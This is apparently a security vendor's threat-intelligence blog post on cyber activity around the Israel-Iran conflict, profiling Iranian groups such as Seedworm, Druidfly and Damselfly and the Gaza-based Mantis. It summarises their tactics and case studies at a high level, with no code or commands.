Is Cyber the Next Stage of War in the Middle East Conflict?

The conflict in the Middle East continues to make headlines, as it has done since the October 7, 2023 Hamas attacks against Israel, which led to Israel retaliating with an ongoing onslaught on the Gaza Strip. The situation heated up further in recent weeks, with Israel and Iran both bombing each other’s territories, leading to U.S. intervention when it bombed Iran’s nuclear facilities, attempting to disrupt or destroy Iran’s nuclear program. Shortly after, U.S. President Donald Trump announced a ceasefire between the two countries, which, at time of writing, appears to be tentatively holding. 

While most of the attention has focused on the physical actions occurring in this war, such as bombing, aid blockades and destruction, another potential front in the war is cyber space, an increasingly common arena in modern conflicts. Both Israel and Iran, two of the main players in the current hostilities, have a history of carrying out destructive cyber attacks, including against each other. 

We published a whitepaper last year discussing the cyber activity we typically see emanating from this region titled Conflict in the Middle East: An Overview of Cyber Threat Actors and Risks.   

One of the most infamous cyber incidents to take place in this region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. This facility was one of the targets bombed by the U.S. in its recent strikes against Iran. Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Stuxnet has long been suspected to be the work of the U.S. and Israel, though it has never been claimed by either country. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against these governments without our knowledge. 

Recent media reports indicate potential cyber warfare impacting the region, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile). 

Damselfly is just one of the key cyber actors who are most likely to be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes. 

Key Actors

We have reasonably good insight into some of the main Iranian actors and their activity. Iranian threat actors have become increasingly proficient in recent years. Not only has their malware improved, but they’ve also developed a strong social engineering capability that they’ve leveraged against targets of interest, even mounting digital honeytrap operations.

One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S., and its long-standing foe Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.

There are a couple of Iranian threat actors worth noting that are among the most active at the moment, the first of which is Seedworm (aka MuddyWater, Temp Zagros, Static Kitten). Seedworm is a long-standing Iranian group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, CISA said that Seedworm is “a subordinate element within the Iranian Ministry of Intelligence and Security.” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.

While originally focused on espionage, in recent times Seedworm has begun either collaborating with another threat group, or else has a sub-group within it, carrying out destructive attacks that masquerade as ransomware. These attacks involve ransomware known as DarkBit and, while it does encrypt computers like regular ransomware, the attackers seem more interested in making a statement than collecting a ransom. Some of the ransom notes they’ve left have had an unusually political tone, implying the ransomware was deployed more as retaliation rather than a money generating exercise.

Case Study: Seedworm targets smaller organizations

A recent campaign tentatively linked to Seedworm focused on smaller organizations, including organizations in utility, transport, and the manufacturing sector outside the Middle East.

The attackers took advantage of compromised home routers that were infected with the Mirai malware. It isn’t clear if this access was purchased or if the infections were initiated by Seedworm itself, but it had access to numerous compromised home routers from which it attacked the victim organizations by proxying through them. These attacks did not come from Iranian IP addresses, they came from small routers in a whole range of countries. Seedworm used this network of hacked routers to scan for vulnerable IIS servers, and used a variety of known vulnerabilities to then gain access to these servers. Once on these servers, it used an off-the-shelf tool, known as Plink, that allowed it to create a reverse RDP tunnel. Plink is a legitimate off-the-shelf tool. RDP inbound connections were blocked by the firewall but Plink is able to create an outbound SSH connection back to the attacker, which is allowed, and that connection is then used to tunnel classic RDP traffic, bypassing the firewall.

Seedworm then sideloaded BruteRatel, a commercial red-teaming and adversarial attack simulation tool, and used a scheduled task for persistence. The attackers used Brute Ratel to obtain credentials and once they had them they began to latterly traverse to other machines and ultimately obtained more credentials using reg.exe, by dumping the SAM. Seedworm then gained access to file servers and SQL servers seeking data of interest. It launched SQL injection attacks across the internal network to gain access to the SQL servers.

The attackers then installed ndisproxy on the web servers to create an attacker-in-the-middle (AITM) attack to exploit and infect actual victims of interest, such as government organizations that visit and use these private organizations’ services. In most cases, they weren’t interested in the infected victim, they were actually interested in using the access as a jumping off point to gain access to another organization. 

Some of the target organizations held key personal data of victims of interest – for example government officials. The attackers also appeared to be interested in digital certs, which they stole to sign their own tools to use against other organizations. Transportation companies were also among the group’s targets. Iranian attack groups have historically been interested in the transport sector in order to track the movements of both goods and individuals to gain an insight into military equipment and high-value shipments etc, and, in some cases, for the purposes of foreign and domestic intelligence gathering operations.

All of the infected organizations in this campaign were SMBs, in a variety of sectors and all based outside the Middle East. None of them were “typical” victims for Iranian threat groups, pointing to a widening scope in victims targeted by Seedworm.

Druidfly

Druidfly (aka Homeland Justice, Karma), which specializes in disk-wiping attacks, is another Iranian attack group to be aware of. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.

In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks. 

Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study). 

Druidfly is currently active amidst the ongoing conflict and tensions in the region. The Threat Hunter Team tweeted on June 20, 2025, that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.

Case Study: Druidfly attacks on Israeli targets

Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.

The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code. 

Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.

Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:

• HTTPSnoop malware was previously deployed prior to the Druidfly wiping attacks
• Use of the remote desktop tools AnyDesk and ScreenConnect
• Use of ReGeorg web shells

Damselfly

Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).

In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.

Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.

Most recently, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.

Mantis 

Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23), is an Arabic speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations internally within Gaza. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.

The group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main infection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.

These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.

If the Mantis operators are based within Gaza it is unlikely the group is operational at the moment given the blockade of the territory by Israel and limited internet access in the region. However, it’s not unusual for members of groups to be based outside the countries or regions they are operating on behalf of, which could be the case for Mantis operators, though we have no evidence of this.

What next?

As the conflict in the Middle East continues, the types of cyberattacks we are likely to see emanating from Iran, potentially directed at Israel but also against its backers such as the U.S., are probably going to be either espionage or disruption attacks. Seedworm, Damselfly and Druidfly are some of the most likely actors we could see venturing into this conflict, with the groups having the skills and experience to carry out potentially serious and destructive attacks.

Iranian actors’ skills at social engineering are something that organizations in Israel, the U.S., and other nations or organizations of interest should be aware of. Iranian threat actors also have a history of carrying out attacks at times when they know organizations' guard may be down - such as at the weekend or during public holidays when activity would be more likely to pass unnoticed for a longer period of time. This was most clearly demonstrated during the Shamoon wiping attacks that targeted organizations in Saudi Arabia in 2012, 2016 and 2018, which mostly began on holidays or weekends. As we head into vacation season for many in the U.S., cyber teams should have their guard up as threat actors may think this quieter time could be a prime opportunity to get a grip on networks and potentially cause major disruption.

Further Reading

Learn more about these and other Middle Eastern threat actors in our comprehensive whitepapers:

• Conflict in the Middle East: An Overview of Cyber Threat Actors and Risks
• Iranian Threat Actors